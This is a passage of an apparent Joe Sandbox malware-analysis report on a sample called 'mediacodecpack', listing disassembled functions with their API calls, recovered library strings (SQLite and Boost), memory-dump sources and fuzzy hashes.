                                                                                • Instruction Fuzzy Hash: FB51F674A043689BDB26CF28C980789BBFABF55304F1481D9E89CAB341C7759E85CF40
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(?,00000000), ref: 00405BB3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID: $
                                                                                • API String ID: 1807457897-3032137957
                                                                                • Opcode ID: d62f257e1640a576e7c9989f97778ac9c58cbb7090796bbb9a31cafd0bd77437
                                                                                • Instruction ID: d944e0326c6926f7701021ceed1c995ec26cf4905102b61f872e2d2972a5c282
                                                                                • Opcode Fuzzy Hash: d62f257e1640a576e7c9989f97778ac9c58cbb7090796bbb9a31cafd0bd77437
                                                                                • Instruction Fuzzy Hash: 824168300186589AFB119724CD89BFB3FA9EB05B00F1400FAD586FB1D2C2394954DFAA
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: string or blob too big$|
                                                                                • API String ID: 632333372-330586046
                                                                                • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                                • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                                • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_logsqlite3_value_text
                                                                                • String ID: string or blob too big
                                                                                • API String ID: 2320820228-2803948771
                                                                                • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                                                • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                                • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02D073D7,?,?,00000000), ref: 02D086D4
                                                                                • getsockname.WS2_32(?,?,?), ref: 02D086EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastgetsockname
                                                                                • String ID: &'
                                                                                • API String ID: 566540725-655172784
                                                                                • Opcode ID: 9cbbb4b47e9bbf6b6f0b27d7a32d0fe45c7c0feb88e7acbf7590697a56534c41
                                                                                • Instruction ID: 3fb24db5110947d8335e6cad45e020f5fc18c69a218a76f320f420118ed7f5b7
                                                                                • Opcode Fuzzy Hash: 9cbbb4b47e9bbf6b6f0b27d7a32d0fe45c7c0feb88e7acbf7590697a56534c41
                                                                                • Instruction Fuzzy Hash: 2A214175A002489FDB10DFA8D894BCEB7B5FF48324F51856AE918EB390D730AD458B50
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0BCB8
                                                                                  • Part of subcall function 02D0C294: std::exception::exception.LIBCMT ref: 02D0C2C3
                                                                                  • Part of subcall function 02D0CA4A: __EH_prolog.LIBCMT ref: 02D0CA4F
                                                                                  • Part of subcall function 02D127C5: _malloc.LIBCMT ref: 02D127DD
                                                                                  • Part of subcall function 02D0C2F3: __EH_prolog.LIBCMT ref: 02D0C2F8
                                                                                Strings
                                                                                • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D0BCF5
                                                                                • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02D0BCEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$_mallocstd::exception::exception
                                                                                • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                • API String ID: 1953324306-1943798000
                                                                                • Opcode ID: 2b312c3842b3feb2d789e4f452fe5df13d29d644bd8dba25a8f01091e0d2cf1b
                                                                                • Instruction ID: 433258ad7a1627941de77fc5128e1175e7237ef12531e30536347f68f8ca4518
                                                                                • Opcode Fuzzy Hash: 2b312c3842b3feb2d789e4f452fe5df13d29d644bd8dba25a8f01091e0d2cf1b
                                                                                • Instruction Fuzzy Hash: 0E217E71D052589ADB04EFE4E494BAEBBB5EF54708F00459EE846B73A0DB705E04CF61
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0BDAD
                                                                                  • Part of subcall function 02D0C36B: std::exception::exception.LIBCMT ref: 02D0C398
                                                                                  • Part of subcall function 02D0CB81: __EH_prolog.LIBCMT ref: 02D0CB86
                                                                                  • Part of subcall function 02D127C5: _malloc.LIBCMT ref: 02D127DD
                                                                                  • Part of subcall function 02D0C3C8: __EH_prolog.LIBCMT ref: 02D0C3CD
                                                                                Strings
                                                                                • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D0BDEA
                                                                                • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02D0BDE3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$_mallocstd::exception::exception
                                                                                • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                • API String ID: 1953324306-412195191
                                                                                • Opcode ID: 007855d3c105506d167368117e32c4434ec9dfb708a146423f8c617ff652b124
                                                                                • Instruction ID: 5f93c0eae5571b694bcd354407b20894ab9419da54517025db12f2ca8fe24853
                                                                                • Opcode Fuzzy Hash: 007855d3c105506d167368117e32c4434ec9dfb708a146423f8c617ff652b124
                                                                                • Instruction Fuzzy Hash: 7721B171E042149ADB04EFE4E894BAEBBB5EF54704F00455EED05A73A0DB705E08CFA1
                                                                                APIs
                                                                                • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                                • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                • String ID:
                                                                                • API String ID: 3265351223-3916222277
                                                                                • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                                • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                                • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_stricmp
                                                                                • String ID: log
                                                                                • API String ID: 912767213-2403297477
                                                                                • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                                • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                                • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0396A
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D039C1
                                                                                  • Part of subcall function 02D01410: std::exception::exception.LIBCMT ref: 02D01428
                                                                                  • Part of subcall function 02D09622: __EH_prolog.LIBCMT ref: 02D09627
                                                                                  • Part of subcall function 02D09622: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D09636
                                                                                  • Part of subcall function 02D09622: __CxxThrowException@8.LIBCMT ref: 02D09655
                                                                                Strings
                                                                                • Day of month is not valid for year, xrefs: 02D039AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Day of month is not valid for year
                                                                                • API String ID: 1404951899-1521898139
                                                                                • Opcode ID: eb16074b02dee82f968441a71304b3146950371d1eb37b78206a6d098361cd46
                                                                                • Instruction ID: 2dd13edcb71019a8aa854a32f985d2c0a55c5b9a8a85a912f232862e785ffe35
                                                                                • Opcode Fuzzy Hash: eb16074b02dee82f968441a71304b3146950371d1eb37b78206a6d098361cd46
                                                                                • Instruction Fuzzy Hash: C4019E36814249AADB05EFA4D845BEEB779FF64B10F00441AFC04A3350EB709F59CBA5
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_strnicmp
                                                                                • String ID: SQLITE_
                                                                                • API String ID: 1961171630-787686576
                                                                                • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                                • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                                • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                                APIs
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                Strings
                                                                                • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                • String ID: Invalid argument to rtreedepth()
                                                                                • API String ID: 1063208240-2843521569
                                                                                • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                                APIs
                                                                                • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                  • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                  • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                  • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                  • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                • String ID: soft_heap_limit
                                                                                • API String ID: 1251656441-405162809
                                                                                • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                                • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                                APIs
                                                                                • std::exception::exception.LIBCMT ref: 02D0EB1B
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D0EB30
                                                                                  • Part of subcall function 02D127C5: _malloc.LIBCMT ref: 02D127DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                • String ID: bad allocation
                                                                                • API String ID: 4063778783-2104205924
                                                                                • Opcode ID: 5b59369ea94338b42a1b597a92f8bfe7254d566f72581927fd6f076022e39184
                                                                                • Instruction ID: 2f5586c84a846f7630ee2d8b502bc166bd9408e510c958b29af4e1f10274237d
                                                                                • Opcode Fuzzy Hash: 5b59369ea94338b42a1b597a92f8bfe7254d566f72581927fd6f076022e39184
                                                                                • Instruction Fuzzy Hash: 1BF0AE7060031A76EF14E6A8A995AAF73FCDF04714F500555EA11D37C0EF71ED14C591
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D03C1B
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 02D03C30
                                                                                  • Part of subcall function 02D114C7: std::exception::exception.LIBCMT ref: 02D114D1
                                                                                  • Part of subcall function 02D0965B: __EH_prolog.LIBCMT ref: 02D09660
                                                                                  • Part of subcall function 02D0965B: __CxxThrowException@8.LIBCMT ref: 02D09689
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 1300498068-3145022300
                                                                                • Opcode ID: b965135cdd8a867bcba13d713027576447fbb8e9ce33150c6d11b7c71b1bc461
                                                                                • Instruction ID: 0ab1bbae888c5014d80bf86488a42d857afa3321930f6661e2248d9fa76d9d07
                                                                                • Opcode Fuzzy Hash: b965135cdd8a867bcba13d713027576447fbb8e9ce33150c6d11b7c71b1bc461
                                                                                • Instruction Fuzzy Hash: 6DF0A732900504DBC709DF54D4417EAB775EF52715F1041AEED0A57350CB729D4ACAA1
                                                                                APIs
                                                                                • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                                • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: NULL
                                                                                • API String ID: 632333372-324932091
                                                                                • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                                • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D038D2
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D038F1
                                                                                  • Part of subcall function 02D01410: std::exception::exception.LIBCMT ref: 02D01428
                                                                                  • Part of subcall function 02D07990: _memmove.LIBCMT ref: 02D079B0
                                                                                Strings
                                                                                • Year is out of valid range: 1400..10000, xrefs: 02D038E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Year is out of valid range: 1400..10000
                                                                                • API String ID: 3258419250-2344417016
                                                                                • Opcode ID: 42e78c89e654bdd77b3b60c30eb3b83fee70d3c9288a7c8df27e569f2d3e90b3
                                                                                • Instruction ID: 3d0c7dcd2a53f138686a959db870a3097933a629adcfac539a6b28f07c166f99
                                                                                • Opcode Fuzzy Hash: 42e78c89e654bdd77b3b60c30eb3b83fee70d3c9288a7c8df27e569f2d3e90b3
                                                                                • Instruction Fuzzy Hash: 27E09232E402245BEB14AB98C9527DDB779DF58718F00049AE805777C0DAB16D48CBE0
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D03886
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D038A5
                                                                                  • Part of subcall function 02D01410: std::exception::exception.LIBCMT ref: 02D01428
                                                                                  • Part of subcall function 02D07990: _memmove.LIBCMT ref: 02D079B0
                                                                                Strings
                                                                                • Day of month value is out of range 1..31, xrefs: 02D03894
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Day of month value is out of range 1..31
                                                                                • API String ID: 3258419250-1361117730
                                                                                • Opcode ID: b9177f144503eb45fe3683455aa548c55f5bbb12d66a4501d19553d1075ad522
                                                                                • Instruction ID: b5101421ead7136c2604647d03fcd01f3766dac1e779ddf785a187babbfa208d
                                                                                • Opcode Fuzzy Hash: b9177f144503eb45fe3683455aa548c55f5bbb12d66a4501d19553d1075ad522
                                                                                • Instruction Fuzzy Hash: DCE0D872E4122457E714EF98C8517DDB779DF58714F00089AE801777C0DAB56D488BE0
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D0391E
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D0393D
                                                                                  • Part of subcall function 02D01410: std::exception::exception.LIBCMT ref: 02D01428
                                                                                  • Part of subcall function 02D07990: _memmove.LIBCMT ref: 02D079B0
                                                                                Strings
                                                                                • Month number is out of range 1..12, xrefs: 02D0392C
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Month number is out of range 1..12
                                                                                • API String ID: 3258419250-4198407886
                                                                                • Opcode ID: 3b9b9323fbe93e94091f074058f6f8f6378987075a8f2cc8f3cd6afe802157b8
                                                                                • Instruction ID: 16a11d090cfa57d1377517ae2b70676629ea1644d3e768889cebc55e12d89c27
                                                                                • Opcode Fuzzy Hash: 3b9b9323fbe93e94091f074058f6f8f6378987075a8f2cc8f3cd6afe802157b8
                                                                                • Instruction Fuzzy Hash: 1AE0D832E4022497E724AB98C9517EDB779EF18718F00045AE801777C0DAB16D4C8BE0
                                                                                APIs
                                                                                • TlsAlloc.KERNEL32 ref: 02D019CC
                                                                                • GetLastError.KERNEL32 ref: 02D019D9
                                                                                  • Part of subcall function 02D01712: __EH_prolog.LIBCMT ref: 02D01717
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocErrorH_prologLast
                                                                                • String ID: tss
                                                                                • API String ID: 249634027-1638339373
                                                                                • Opcode ID: 1bfa5551ed2acea7caf79ecd2f05dc53ac20a64202d9175dbf38ac29f0b8ec59
                                                                                • Instruction ID: d76995bcb362cc727e8373de73b7d012fa7d13978e30fb20a9acfd4b206ee073
